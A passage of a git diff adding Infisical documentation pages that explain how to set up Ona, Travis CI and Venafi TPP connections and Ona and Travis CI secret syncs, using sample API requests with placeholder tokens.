"[API TOKEN]" + } + }' + ``` + + ### Sample response + + ```bash Response + { + "appConnection": { + "id": "3c2a1b4d-97e6-4f18-b3c2-8e5d9a0f1234", + "name": "my-doppler-connection", + "description": null, + "version": 1, + "orgId": "6f03caa1-a5de-43ce-b127-95a145d3464c", + "createdAt": "2025-04-23T19:46:34.831Z", + "updatedAt": "2025-04-23T19:46:34.831Z", + "isPlatformManagedCredentials": false, + "credentialsHash": "9a1e482fbc306g93b1d6e2ce0d081b340dfcbg99f005b7c506f3ecd1391772g0", + "app": "doppler", + "method": "api-token", + "credentials": {} + } + } + ``` + + + diff --git a/docs/integrations/app-connections/gitlab.mdx b/docs/integrations/app-connections/gitlab.mdx index 6c45c4b30b6..2db44b27866 100644 --- a/docs/integrations/app-connections/gitlab.mdx +++ b/docs/integrations/app-connections/gitlab.mdx @@ -8,6 +8,10 @@ Infisical supports two methods for connecting to GitLab: **OAuth** and **Access The OAuth method provides secure authentication through GitLab's OAuth flow. + + + Oauth Method is only supported in Self-Hosted mode. + Using the GitLab Connection with OAuth on a self-hosted instance of Infisical requires configuring an OAuth application in GitLab and registering your instance with it. diff --git a/docs/integrations/app-connections/ona.mdx b/docs/integrations/app-connections/ona.mdx new file mode 100644 index 00000000000..a6e09d4563a --- /dev/null +++ b/docs/integrations/app-connections/ona.mdx @@ -0,0 +1,113 @@ +--- +title: "Ona Connection" +description: "Learn how to configure an Ona Connection for Infisical." +--- + +Infisical supports connecting to [Ona](https://www.gitpod.io/) (Gitpod's cloud development environment platform) using a Personal Access Token (PAT). + +## Create an Ona Personal Access Token + + + + + In the lower-left corner of Ona, select your name, then click the gear icon to open user settings. + + ![Open Account setting](/images/app-connections/ona/ona-account-settings.png) + + + + + ![PAT tab](/images/app-connections/ona/ona-access-token-tab.png) + + + + Click the **New Token** button and add a description for the token (eg, "infisical integration"). The token must have Read & Write access so that Infisical can apply changes in Ona. + + + Personal access tokens have an expiration date, so you will need to manually rotate them before they expire to avoid integration downtime. Consider setting a calendar reminder for this task. + + + ![Open PAT section](/images/app-connections/ona/ona-pat-section.png) + ![New token modal](/images/app-connections/ona/ona-pat-creation-modal.png) + + + Make sure to save the token, as it won't be shown again. + + ![Copy Token](/images/app-connections/ona/ona-pat-copy.png) + + + +## Create an Ona Connection in Infisical + + + + + + In your Infisical dashboard, open the **Integrations** tab for the desired project and select **App Connections**. Click **+ Add Connection**. + + ![App Connections Tab](/images/app-connections/general/add-connection.png) + + + Choose **Ona Connection** from the list of integrations. + + ![Select Ona Connection](/images/app-connections/ona/ona-app-connection-option.png) + + + Complete the form by providing: + + - A descriptive **Name** for the connection. + - An optional **Description**. + - The **Personal Access Token** you generated in Ona. + + ![Ona Connection Modal](/images/app-connections/ona/ona-app-connection-form.png) + + + After submitting the form, your **Ona Connection** will be created. + + ![Ona Connection Created](/images/app-connections/ona/ona-app-connection-generated.png) + + + + + + To create an Ona Connection via API, send a request to the [Create Ona Connection](/api-reference/endpoints/app-connections/ona/create) endpoint. + + ### Sample request + + ```bash Request + curl --request POST \ + --url https://app.infisical.com/api/v1/app-connections/ona \ + --header 'Content-Type: application/json' \ + --data '{ + "name": "my-ona-connection", + "method": "personal-access-token", + "projectId": "abcdef12-3456-7890-abcd-ef1234567890", + "credentials": { + "personalAccessToken": "[PERSONAL ACCESS TOKEN]" + } + }' + ``` + + ### Sample response + + ```bash Response + { + "appConnection": { + "id": "a1b2c3d4-5678-90ab-cdef-1234567890ab", + "name": "my-ona-connection", + "description": null, + "projectId": "abcdef12-3456-7890-abcd-ef1234567890", + "version": 1, + "orgId": "abcdef12-3456-7890-abcd-ef1234567890", + "createdAt": "2025-01-23T10:15:00.000Z", + "updatedAt": "2025-01-23T10:15:00.000Z", + "isPlatformManagedCredentials": false, + "credentialsHash": "d41d8cd98f00b204e9800998ecf8427e", + "app": "ona", + "method": "personal-access-token", + "credentials": {} + } + } + ``` + + diff --git a/docs/integrations/app-connections/travis-ci.mdx b/docs/integrations/app-connections/travis-ci.mdx new file mode 100644 index 00000000000..cfe483fee79 --- /dev/null +++ b/docs/integrations/app-connections/travis-ci.mdx @@ -0,0 +1,104 @@ +--- +title: "Travis CI Connection" +description: "Learn how to configure a Travis CI Connection for Infisical." +--- + +Infisical supports connecting to [Travis CI](https://www.travis-ci.com/) using a personal API Token. + + + The API Token must belong to a user with sufficient permissions to manage + environment variables on the repositories you plan to sync with Infisical. + + +## Create a Travis CI API Token + + + + Navigate to [https://app.travis-ci.com](https://app.travis-ci.com) and click your profile avatar in the top-right corner, then select **Settings**. + + + In the **Settings** tab, locate the **API authentication** section. Click **Copy Token** to reveal and copy your personal API token. + + ![Copy Travis CI API Token](/images/app-connections/travis-ci/travis-ci-copy-token.png) + + + Treat this token like a password β€” it grants access to every repository you + have permission to administer. Store it somewhere safe; Infisical will + encrypt it at rest once the connection is created. + + + + +## Create a Travis CI Connection in Infisical + + + + + + In your Infisical dashboard, open the **Integrations** tab in the target project and select **App Connections**. + + ![App Connections Tab](/images/app-connections/general/add-connection.png) + + + Click **+ Add Connection** and choose **Travis CI Connection** from the list. + + ![Select Travis CI Connection](/images/app-connections/travis-ci/travis-ci-app-connection-option.png) + + + Complete the form by providing: + - A descriptive **Name** for the connection + - An optional **Description** + - The **API Token** you copied from Travis CI + + ![Travis CI Connection Form](/images/app-connections/travis-ci/travis-ci-app-connection-modal.png) + + + After submitting, your **Travis CI Connection** is ready to be used by Secret Syncs and other Infisical features. + + + + + + + To create a Travis CI Connection via API, send a request to the [Create Travis CI Connection](/api-reference/endpoints/app-connections/travis-ci/create) endpoint. + + ### Sample request + + ```bash Request + curl --request POST \ + --url https://app.infisical.com/api/v1/app-connections/travis-ci \ + --header 'Content-Type: application/json' \ + --data '{ + "name": "my-travis-ci-connection", + "method": "api-token", + "projectId": "7ffbb072-2575-495a-b5b0-127f88caef78", + "credentials": { + "apiToken": "[API TOKEN]" + } + }' + ``` + + ### Sample response + + ```bash Response + { + "appConnection": { + "id": "e5d18aca-86f7-4026-a95e-efb8aeb0d8e6", + "name": "my-travis-ci-connection", + "projectId": "7ffbb072-2575-495a-b5b0-127f88caef78", + "description": null, + "version": 1, + "orgId": "6f03caa1-a5de-43ce-b127-95a145d3464c", + "createdAt": "2026-04-17T19:46:34.831Z", + "updatedAt": "2026-04-17T19:46:34.831Z", + "isPlatformManagedCredentials": false, + "credentialsHash": "example-credentials-hash", + "app": "travis-ci", + "method": "api-token", + "credentials": {} + } + } + ``` + + + diff --git a/docs/integrations/app-connections/venafi-tpp.mdx b/docs/integrations/app-connections/venafi-tpp.mdx new file mode 100644 index 00000000000..8acc5560e7c --- /dev/null +++ b/docs/integrations/app-connections/venafi-tpp.mdx @@ -0,0 +1,63 @@ +--- +title: "Venafi TPP Connection" +description: "Learn how to configure a Venafi Trust Protection Platform (TPP) Connection for Infisical." +--- + +Connect Infisical to a self-hosted Venafi Trust Protection Platform (TPP) instance to use it as an external CA for certificate issuance and management. + +## Prerequisites + +- A self-hosted [Venafi Trust Protection Platform](https://venafi.com/) instance (on-premises or private cloud) +- An API Integration registered in your TPP instance with OAuth enabled +- A TPP user account with `certificate:manage,discover,revoke` and `configuration` scope privileges +- Network connectivity from Infisical to the TPP server (or an Infisical Gateway for airgapped environments) + + + To register an API Integration in Venafi TPP, navigate to **API** > **API Integrations** in the TPP web console + and create a new integration with a Client ID. This Client ID is required when setting up the connection in Infisical. + + +## Connection Setup + + + + Navigate to the **App Connections** tab on the **Organization Settings** page. + ![App Connections Tab](/images/app-connections/general/add-connection.png) + + + Select the **Venafi TPP** option from the connection options modal. + ![Select Venafi TPP Connection](/images/app-connections/venafi-tpp/venafi-tpp-select-connection.png) + + + Configure the following fields: + + - **Name**: A friendly name for this connection (e.g., "Production TPP") + - **Method**: The authentication method. Currently only **OAuth** is supported. + - **Gateway** *(optional)*: Select an Infisical Gateway if your TPP instance is in an airgapped network without direct internet access. + - **TPP URL**: The HTTPS URL of your Venafi TPP instance (e.g., `https://tpp.example.com`). Must use HTTPS. + - **Client ID**: The OAuth Client ID from your TPP API Integration. + - **Username**: The TPP user account. Supports formats: `DOMAIN\username`, `username@domain.com`, or local usernames. + - **Password**: The password for the TPP user account. + + Click **Connect to Venafi TPP** to validate your credentials and create the connection. + + ![Venafi TPP Connection Form](/images/app-connections/venafi-tpp/venafi-tpp-app-connection-form.png) + + + Infisical validates the credentials by authenticating with the TPP OAuth endpoint during connection creation. + If validation fails, verify that: + - The TPP URL is correct and reachable + - The Client ID matches an API Integration registered in TPP + - The username and password are correct + - The API Integration has the required scopes enabled + + + + Your **Venafi TPP Connection** is now available for use as an external CA in your Infisical certificate management projects. + ![Venafi TPP Connection Created](/images/app-connections/venafi-tpp/venafi-tpp-app-connection-created.png) + + + +## Gateway Support + +For Venafi TPP instances running in airgapped or isolated networks, you can route the connection through an [Infisical Gateway](/documentation/platform/gateways/overview). Select the appropriate gateway when creating the connection to enable Infisical to reach your TPP server through a secure tunnel. diff --git a/docs/integrations/secret-syncs/ona.mdx b/docs/integrations/secret-syncs/ona.mdx new file mode 100644 index 00000000000..5a7b743ee85 --- /dev/null +++ b/docs/integrations/secret-syncs/ona.mdx @@ -0,0 +1,156 @@ +--- +title: "Ona Sync" +description: "Learn how to configure an Ona Sync for Infisical." +--- + +**Prerequisites:** + +- Set up and add secrets to [Infisical Cloud](https://app.infisical.com) +- Create an [Ona Connection](/integrations/app-connections/ona) + + + + + + + Navigate to **Project** > **Integrations** and select the **Secret Syncs** tab. Click on the **Add Sync** button. + + ![Secret Syncs Tab](/images/secret-syncs/general/secret-sync-tab.png) + + + ![Select Ona](/images/secret-syncs/ona/select-ona-option.png) + + + Configure the **Source** from where secrets should be retrieved, then click **Next**. + + ![Configure Source](/images/secret-syncs/ona/ona-source.png) + + - **Environment**: The project environment to retrieve secrets from. + - **Secret Path**: The folder path to retrieve secrets from. + + + + Configure the **Destination** to where secrets should be deployed, then click **Next**. + + ![Configure Destination](/images/secret-syncs/ona/ona-destination.png) + + - **Ona Connection**: The Ona Connection to authenticate with. + - **Ona Project**: Sync secrets to the selected Ona project as project-level environment variables. Choose the target project from the dropdown populated by your connection. + + + Configure the **Sync Options** to specify how secrets should be synced, then click **Next**. + + ![Configure Sync Options](/images/secret-syncs/ona/ona-options.png) + + - **Initial Sync Behavior**: Determines how Infisical should resolve the initial sync. Ona Sync only supports **Overwrite Destination Secrets**. Any environment-variable secrets at the destination that are not present in Infisical will be removed on the first sync. + - **Key Schema**: Template that determines how secret names are transformed when syncing, using `{{secretKey}}` as a placeholder for the original secret name and `{{environment}}` for the environment. + + We highly recommend using a Key Schema to ensure that Infisical only manages the specific keys you intend, keeping everything else untouched. + + - **Auto-Sync Enabled**: If enabled, secrets will automatically be synced from the source location when changes occur. Disable to enforce manual syncing only. + - **Disable Secret Deletion**: If enabled, Infisical will not remove secrets from the sync destination. Enable this option if you intend to manage some secrets manually outside of Infisical. + + + Configure the **Details** of your Ona Sync, then click **Next**. + + ![Configure Details](/images/secret-syncs/ona/ona-details.png) + + - **Name**: The name of your sync. Must be slug-friendly. + - **Description**: An optional description for your sync. + + + Review your Ona Sync configuration, then click **Create Sync**. + + ![Review Configuration](/images/secret-syncs/ona/ona-review.png) + + + If enabled, your Ona Sync will begin syncing your secrets to the destination endpoint. + + ![Sync Created](/images/secret-syncs/ona/ona-created.png) + + + + + To create an **Ona Sync**, make an API request to the [Create Ona Sync](/api-reference/endpoints/secret-syncs/ona/create) API endpoint. + + ### Sample request + + ```bash Request + curl --request POST \ + --url https://app.infisical.com/api/v1/secret-syncs/ona \ + --header 'Content-Type: application/json' \ + --data '{ + "name": "my-ona-sync", + "projectId": "3c90c3cc-0d44-4b50-8888-8dd25736052a", + "description": "an example sync", + "connectionId": "3c90c3cc-0d44-4b50-8888-8dd25736052a", + "environment": "dev", + "secretPath": "/my-secrets", + "isAutoSyncEnabled": true, + "syncOptions": { + "initialSyncBehavior": "overwrite-destination", + "keySchema": "INFISICAL_{{secretKey}}" + }, + "destinationConfig": { + "projectId": "ona-project-uuid", + "projectName": "my-ona-project" + } + }' + ``` + + ### Sample response + + ```json Response + { + "secretSync": { + "id": "3c90c3cc-0d44-4b50-8888-8dd25736052a", + "name": "my-ona-sync", + "description": "an example sync", + "isAutoSyncEnabled": true, + "version": 1, + "folderId": "3c90c3cc-0d44-4b50-8888-8dd25736052a", + "connectionId": "3c90c3cc-0d44-4b50-8888-8dd25736052a", + "createdAt": "2025-01-23T10:15:00Z", + "updatedAt": "2025-01-23T10:15:00Z", + "syncStatus": "succeeded", + "lastSyncJobId": "123", + "lastSyncMessage": null, + "lastSyncedAt": "2025-01-23T10:15:00Z", + "importStatus": null, + "lastImportJobId": null, + "lastImportMessage": null, + "lastImportedAt": null, + "removeStatus": null, + "lastRemoveJobId": null, + "lastRemoveMessage": null, + "lastRemovedAt": null, + "syncOptions": { + "initialSyncBehavior": "overwrite-destination", + "keySchema": "INFISICAL_{{secretKey}}", + "disableSecretDeletion": false + }, + "projectId": "3c90c3cc-0d44-4b50-8888-8dd25736052a", + "connection": { + "app": "ona", + "name": "my-ona-connection", + "id": "3c90c3cc-0d44-4b50-8888-8dd25736052a" + }, + "environment": { + "slug": "dev", + "name": "Development", + "id": "3c90c3cc-0d44-4b50-8888-8dd25736052a" + }, + "folder": { + "id": "3c90c3cc-0d44-4b50-8888-8dd25736052a", + "path": "/my-secrets" + }, + "destination": "ona", + "destinationConfig": { + "projectId": "ona-project-uuid", + "projectName": "my-ona-project" + } + } + } + ``` + + diff --git a/docs/integrations/secret-syncs/travis-ci.mdx b/docs/integrations/secret-syncs/travis-ci.mdx new file mode 100644 index 00000000000..a2d333e6535 --- /dev/null +++ b/docs/integrations/secret-syncs/travis-ci.mdx @@ -0,0 +1,174 @@ +--- +title: "Travis CI Sync" +description: "Learn how to configure a Travis CI Sync for Infisical." +--- + +Infisical's Travis CI Sync keeps your Travis CI repository environment variables in sync with an Infisical project. Account-level environment variables (`account_env_vars`) are not managed by this sync, only repository-scoped environment variables are. + + + `account_env_vars` are not exposed by the Travis CI API for listing or creation, so Infisical cannot sync them. + + +**Prerequisites:** + +- Set up and add secrets to [Infisical Cloud](https://app.infisical.com) +- Create a [Travis CI Connection](/integrations/app-connections/travis-ci) + + + + + + Navigate to **Project** > **Integrations** and select the **Secret Syncs** tab. Click on the **Add Sync** button. + + ![Secret Syncs Tab](/images/secret-syncs/general/secret-sync-tab.png) + + + Select the **Travis CI** option from the list of destinations. + + ![Select Travis CI](/images/secret-syncs/travis-ci/select-travis-ci-option.png) + + + Configure the **Source** from where secrets should be retrieved, then click **Next**. + + ![Configure Source](/images/secret-syncs/travis-ci/travis-ci-source.png) + + - **Environment**: The project environment to retrieve secrets from. + - **Secret Path**: The folder path to retrieve secrets from. + + + If you need to sync secrets from multiple folder locations, check out [secret imports](/documentation/platform/secret-reference#secret-imports). + + + + Configure the **Destination** to where secrets should be deployed, then click **Next**. + + ![Configure Destination](/images/secret-syncs/travis-ci/travis-ci-destination.png) + + - **Travis CI Connection**: The Travis CI Connection to authenticate with. + - **Repository**: The Travis CI repository to sync secrets to. + - **Branch** *Optional*: The branch that synced environment variables will be scoped to on Travis CI. If left empty, the sync will manage environment variables that aren't scoped to any branch (i.e. repository-level variables). + + + Configure the **Sync Options** to specify how secrets should be synced, then click **Next**. + + ![Configure Options](/images/secret-syncs/travis-ci/travis-ci-options.png) + + - **Initial Sync Behavior**: Determines how Infisical should resolve the initial sync. + - **Overwrite Destination Secrets**: Removes any environment variables at the destination not present in Infisical. + + Travis CI does not support importing secrets. + + - **Key Schema**: Template that determines how secret names are transformed when syncing, using `{{secretKey}}` as a placeholder for the original secret name and `{{environment}}` for the environment. + + We highly recommend using a Key Schema to ensure that Infisical only manages the specific keys you intend, keeping everything else untouched. + + - **Auto-Sync Enabled**: If enabled, secrets will automatically be synced when changes occur at the source location. Disable to enforce manual syncing only. + - **Disable Secret Deletion**: If enabled, Infisical will not remove environment variables from Travis CI during a sync. Enable this option if you intend to manage some environment variables manually outside of Infisical. + + + Configure the **Details** of your Travis CI Sync, then click **Next**. + + ![Configure Details](/images/secret-syncs/travis-ci/travis-ci-details.png) + + - **Name**: The name of your sync. Must be slug-friendly. + - **Description**: An optional description for your sync. + + + Review your Travis CI Sync configuration, then click **Create Sync**. + + ![Confirm Configuration](/images/secret-syncs/travis-ci/travis-ci-review.png) + + + If enabled, your Travis CI Sync will begin pushing your Infisical secrets to the configured repository (and branch, if scoped). + + ![Sync Created](/images/secret-syncs/travis-ci/travis-ci-created.png) + + + + + To create a **Travis CI Sync**, make an API request to the [Create Travis CI Sync](/api-reference/endpoints/secret-syncs/travis-ci/create) API endpoint. + + The `branch` field inside `destinationConfig` is optional. Omit it to manage repository-level environment variables, or set it to scope the sync to a specific branch on Travis CI. + + ### Sample request + + ```bash Request + curl --request POST \ + --url https://app.infisical.com/api/v1/secret-syncs/travis-ci \ + --header 'Content-Type: application/json' \ + --data '{ + "name": "my-travis-ci-sync", + "projectId": "3c90c3cc-0d44-4b50-8888-8dd25736052a", + "description": "Push Infisical secrets to the Travis CI repository", + "connectionId": "3c90c3cc-0d44-4b50-8888-8dd25736052a", + "environment": "dev", + "secretPath": "/", + "isAutoSyncEnabled": true, + "syncOptions": { + "initialSyncBehavior": "overwrite-destination", + "disableSecretDeletion": false + }, + "destinationConfig": { + "repositoryId": "12345678", + "repositorySlug": "my-org/my-repo", + "branch": "main" + } + }' + ``` + + ### Sample response + + ```bash Response + { + "secretSync": { + "id": "3c90c3cc-0d44-4b50-8888-8dd25736052a", + "name": "my-travis-ci-sync", + "description": "Push Infisical secrets to the Travis CI repository", + "isAutoSyncEnabled": true, + "version": 1, + "folderId": "3c90c3cc-0d44-4b50-8888-8dd25736052a", + "connectionId": "3c90c3cc-0d44-4b50-8888-8dd25736052a", + "createdAt": "2026-04-17T05:31:56Z", + "updatedAt": "2026-04-17T05:31:56Z", + "syncStatus": "succeeded", + "lastSyncJobId": "123", + "lastSyncMessage": null, + "lastSyncedAt": "2026-04-17T05:31:56Z", + "importStatus": null, + "lastImportJobId": null, + "lastImportMessage": null, + "lastImportedAt": null, + "removeStatus": null, + "lastRemoveJobId": null, + "lastRemoveMessage": null, + "lastRemovedAt": null, + "syncOptions": { + "initialSyncBehavior": "overwrite-destination", + "disableSecretDeletion": false + }, + "projectId": "3c90c3cc-0d44-4b50-8888-8dd25736052a", + "connection": { + "app": "travis-ci", + "name": "my-travis-ci-connection", + "id": "3c90c3cc-0d44-4b50-8888-8dd25736052a" + }, + "environment": { + "slug": "dev", + "name": "Development", + "id": "3c90c3cc-0d44-4b50-8888-8dd25736052a" + }, + "folder": { + "id": "3c90c3cc-0d44-4b50-8888-8dd25736052a", + "path": "/" + }, + "destination": "travis-ci", + "destinationConfig": { + "repositoryId": "12345678", + "repositorySlug": "my-org/my-repo", + "branch": "main" + } + } + } + ``` + + diff --git a/docs/integrations/secret-syncs/vercel.mdx b/docs/integrations/secret-syncs/vercel.mdx index de83a20681f..83f6c0c612e 100644 --- a/docs/integrations/secret-syncs/vercel.mdx +++ b/docs/integrations/secret-syncs/vercel.mdx @@ -3,6 +3,14 @@ title: "Vercel Sync" description: "Learn how to configure a Vercel Sync for Infisical." --- +Infisical's Vercel Sync lets you automatically push secrets from Infisical into your Vercel project's environment variables, keeping both platforms in sync without manual copy-paste. + +The short video below walks through configuring a Vercel Sync end-to-end. + +
+